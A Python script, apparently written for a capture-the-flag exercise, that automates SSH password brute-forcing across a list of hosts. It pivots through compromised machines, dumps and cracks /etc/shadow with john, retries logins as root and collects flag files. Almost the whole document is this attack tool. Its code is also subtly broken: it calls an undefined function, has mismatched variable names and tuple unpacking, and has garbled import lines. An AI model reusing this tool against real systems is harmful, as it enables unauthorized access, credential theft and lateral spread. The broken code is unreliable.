- #!/usr/bin/env python
- import os
- import paramiko
- import re
- import subprocess
- import sys
# Matches one cracker output line of the form "<password> (<user>)":
# group(1) is the password, group(2) the user (see how crack_john reads the groups).
CRED_REGEX = re.compile("^(\S+)\s+\((\S+)\)$")
# Module-level state shared by every function below; the script is one flat module
# and mutates these in place rather than passing them around.
FLAG_LOCS = {}      # host -> contents read from /flag.txt on that host
SEEN = []           # hosts where crack() logged in successfully
REVISIT = []        # (host, pivot_host) pairs reached as a non-root user; retried as root by revisit2()
NUM_SHDW = 0        # number of passwd/shadow dumps handed to crack_john()
NUM_SSHK = 0        # declared here but not read or written anywhere else on this page
active_user = ""    # starting credentials; both empty on this page
active_pass = ""
creds = {
    "SELF": [(active_user, active_pass)]   # host -> list of (user, password) pairs that worked
}
usrs = [active_user]    # candidate usernames; extended by crack_john()
pwds = [active_pass]    # candidate passwords; extended by crack_john()
ip_temp = []            # flat list of hosts already queued, used to avoid re-queueing
ip = []                 # work queue of (host, pivot_host); pivot_host None means connect directly
conn = {}               # host -> (transport_or_None, paramiko.SSHClient) for open sessions
def revisit2():
    """Retry every host in REVISIT as root with each password currently in pwds.

    For each successful root login the same collection steps as the main loop run:
    read ~/servers.txt (new hosts are queued on ip), read /flag.txt (stored in
    FLAG_LOCS), then read /etc/shadow and /etc/passwd and hand them to the cracker.
    Called from the main loop after a shadow dump is processed.
    """
    global REVISIT, creds
    tmp = []
    for (ipa, wfrom) in REVISIT:
        for pwd in pwds:
            try:
                # Every attempted password is printed in clear text to stdout.
                print("[*] *revisiting for root* Attempting login to %s with root/%s" % (ipa, pwd))
                if wfrom:
                    # Pivot through the already-open session to wfrom.
                    (_, connection, sport) = conn[wfrom]
                    (tnl, cli) = tunnel(ipa, "root", pwd, connection)
                else:
                    (tnl, cli) = tunnel(ipa, "root", pwd)
                connection = cli
                conn[ipa] = (tnl, cli)
                tmp.append((ipa, wfrom))
                print("[*] Login to %s succeeded" % (ipa))
                if ipa in creds.keys():
                    creds[ipa].append(("root", pwd))
                else:
                    creds[ipa] = [("root", pwd)]
                # Each remote read below is a separate exec_command; the commands are
                # visible in the target's SSH session/auth logs and process accounting.
                (_, stdout, stderr) = connection.exec_command("cat ~/servers.txt")
                tmp = stdout.read()
                if tmp:
                    print("[*] Found servers file on %s" % (ipa))
                    for i in tmp.strip().split("\n"):
                        if i not in ip_temp:
                            ip.append((i, ipa))
                            ip_temp.append(i)
                    print("[+] Adding %s to global target queue" % (str(tmp.strip().split("\n"))))
                else:
                    print("[*] Servers file not found on %s" % (ipa))
                (_, stdout, stderr) = connection.exec_command("cat /flag.txt")
                tmp = stdout.read()
                if tmp:
                    if ipa not in FLAG_LOCS.keys():
                        print("[!] Flag file found on %s, contents: \"%s\"" % (ipa, tmp))
                        FLAG_LOCS[ipa] = tmp
                    else:
                        print("[!] Flag file had been found before on %s" % (ipa))
                elif stderr.read():
                    print("[*] No flag file found on %s" % (ipa))
                (_, stdout, stderr) = connection.exec_command("cat /etc/shadow")
                shdw = stdout.read()
                (_, stdout, stderr) = connection.exec_command("cat /etc/passwd")
                pawd = stdout.read()
                jack(pawd, shdw)
            except Exception as e:
                # Any failure (auth, network, remote command) is printed and the next
                # password is tried; the categories are not distinguished.
                print(e)
                continue
    # Drop the entries that were handled in this pass.
    for i in tmp:
        REVISIT.remove(i)
def tunnel(dst, usr, pwd, cli=None):
    """Open a paramiko SSHClient to dst, given as "host:port", with password auth.

    When cli (an existing SSHClient) is supplied, a forwarded channel is requested on
    that session and used as the socket for the new connection, so the second hop is
    reached via the first. Returns (transport, client); transport is None for a
    direct connection.
    """
    # paramiko's protocol log goes to log.txt in the current working directory.
    paramiko.util.log_to_file("log.txt")
    dst_info = dst.split(":")
    dst_cli = paramiko.SSHClient()
    # Unknown host keys are accepted automatically: the client performs no server
    # identity check, so it offers no protection against an interposed SSH server.
    dst_cli.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    if cli:
        t = cli.get_transport()
        chan = t.open_channel("direct-tcip", src_addr=("127.0.0.1", 22), dest_addr=(dst_info[0], int(dst_info[1])))
        dst_cli.connect(dst_info[0], port=int(dst_info[1]), username=usr, password=pw, sock=chan)
    else:
        t = None
        dst_cli.connect(dst_info[0], port=int(dst_info[1]), username=usr, password=pw)
    return (t, dst_cli)
def crack(ipa, wfrom):
    """Try every usrs x pwds combination against ipa.

    On the first successful login the pair is recorded in creds, the session is kept
    in conn, ipa is appended to SEEN and the username is returned. Returns False when
    no combination works. wfrom is the host whose open session is used as a pivot,
    if it has one in conn.
    """
    global conn, creds
    for usr in usrs:
        for pwd in pwds:
            try:
                # Credentials are echoed in clear text for every attempt.
                print("[*] Attempting login to %s with %s/%s" % (ipa, usr, pwd))
                if wfrom in conn.keys():
                    (_, connection) = conn[wfrom]
                    (tnl, cli) = tunnel(ipa, usr, pwd, connection)
                else:
                    (tnl, cli) = tunnel(ipa, usr, pwd)
                if ipa in creds.keys():
                    creds[ipa].append((usr, pwd))
                else:
                    creds[ipa] = [(usr, pwd)]
                conn[ipa] = (tnl, cli)
                SEEN.append(ipa)
                print("[*] Login to %s succeeded" % (ipa))
                return usr
            except Exception as e:
                # Silently swallowed: an unreachable host and a rejected password look
                # identical to the caller (both end in the False return below).
                continue
    return False
def crack_john(pwd, shdw):
    """Feed a passwd/shadow pair to unshadow + john and extend usrs/pwds with the results.

    pwd and shdw are the raw contents of /etc/passwd and /etc/shadow. Returns True if
    at least one new username or password was added, else False (also False when the
    external tools fail, after printing the exception).
    """
    alter = False
    global usrs, pwds, NUM_SHDW
    NUM_SHDW += 1
    try:
        # The dumps are written to password.txt and shadow.txt in the working
        # directory; together with pwds below these are the on-disk artifacts of a run.
        pfile = open("password.txt", "w")
        sfile = open("shadow.txt", "w")
        pfile.write(str(pwd))
        sfile.write(str(shdw))
        pfile.close()
        sfile.close()
        # External tools are launched through the shell (shell=True) with a fixed
        # command string; john reads the wordlist rockyou.txt from the working directory.
        subprocess.Popen("unshadow password.txt shadow.txt > pwds", shell=True)
        result = subprocess.Popen("john pwds --wordlist=rockyou.txt", stdout=subprocess.PIPE, shell=True)
        for line in result.stdout.readlines():
            credentials = CRED_REGEX.match(line)
            if credentials:
                usr = credentials.group(2)
                if usr not in usrs:
                    usrs.append(usr)
                    alter = True
                pas = creds.group(1)
                if pas not in pwds:
                    pwds.append(pas)
                    alter = True
        # Best-effort cleanup of the three temporary files.
        subprocess.Popen("rm password.txt shadow.txt pwds", shell=True)
        return alter
    except Exception as e:
        print(e)
        print("Failed to crack passwords using john")
        return alter
#if __name__ == "__main__":
# Script body. Because the guard above is commented out, everything below runs on
# import as well as when the file is executed directly.
# Seed the work queue from the local ~/servers.txt (one "host:port" per line), with
# no pivot host.
ip_list = subprocess.Popen("cat ~/servers.txt", stdout=subprocess.PIPE, shell=True)
print("[*] Read targets file")
for i in ip_list.stdout.read().strip().split("\n"):
    ip.append((i, None))
# crack first password and store info to lists
# The local machine's own passwd/shadow are the first input to the cracker.
shadow = subprocess.Popen("cat /etc/shadow", stdout=subprocess.PIPE, shell=True)
password = subprocess.Popen("cat /etc/passwd", stdout=subprocess.PIPE, shell=True)
# call to jack
crack_john(password.stdout.read(), shadow.stdout.read())
# Main loop: pop one (host, pivot) at a time, try to log in, then collect from it.
while(ip):
    curr,wfrom = ip.pop(0)
    user = crack(curr, wfrom)
    tmp = ""
    # Exit when nothing queued or pending revisit is outside SEEN.
    if not ((set(ip) | set(REVISIT)) - set(SEEN)):
        break
    try:
        if user:
            # check user
            # Non-root logins are queued for a later root retry by revisit2().
            if user != "root":
                REVISIT.append((curr, wfrom))
            (_, connection) = conn[curr]
            # Remote reads issued over the new session: ~/servers.txt, /flag.txt,
            # /etc/shadow, /etc/passwd. Each is a separate exec_command.
            (_, stdout, stderr) = connection.exec_command("cat ~/servers.txt")
            tmp = stdout.read()
            if tmp:
                print("[*] Found servers file on %s" % (curr))
                for i in tmp.strip().split("\n"):
                    if i not in ip_temp:
                        ip.append((i, curr))
                        ip_temp.append(i)
                print("[+] Adding %s to global target queue" % (str(tmp.strip().split("\n"))))
            else:
                print("[*] Servers file not found on %s" % (curr))
            (_, stdout, stderr) = connection.exec_command("cat /flag.txt")
            f = stdout.read()
            if f:
                if curr not in FLAG_LOCS.keys():
                    print("[!] Flag file found on %s, contents: \"%s\"" % (curr, f))
                    FLAG_LOCS[curr] = f
                else:
                    print("[!] Flag file had been found before on %s" % (curr))
            elif stderr.read():
                print("[*] No flag file found on %s" % (curr))
            (_, stdout, stderr) = connection.exec_command("cat /etc/shadow")
            tmp = stdout.read()
            if tmp:
                (_, stdout, stderr) = connection.exec_command("cat /etc/passwd")
                print("[*] Dumping /etc/shadow")
                jack(stdout.read(), tmp)
                revisit2()
            elif stderr.read():
                print("[*] User %s on %s cannot access /etc/shadow")
        else:
            # No credential worked yet; requeue so the host is retried after the
            # cracker may have added new candidates.
            print("[*] %s back in line" % (curr))
            ip.append((curr, wfrom))
    except Exception as e:
        # Errors in the collection steps are discarded and the loop moves on.
        #print(e)
        continue
# Run summary.
print("\n%s" % ("=" * 15))
print("Collected %s /etc/shadow files" % (str(NUM_SHDW)))
print("Cracked %s passwords" % (str(len(pwds))))
print("Found %s flag files" % (str(len(FLAG_LOCS.keys()))))
print("Accessed following ips: %s" % (str(creds)))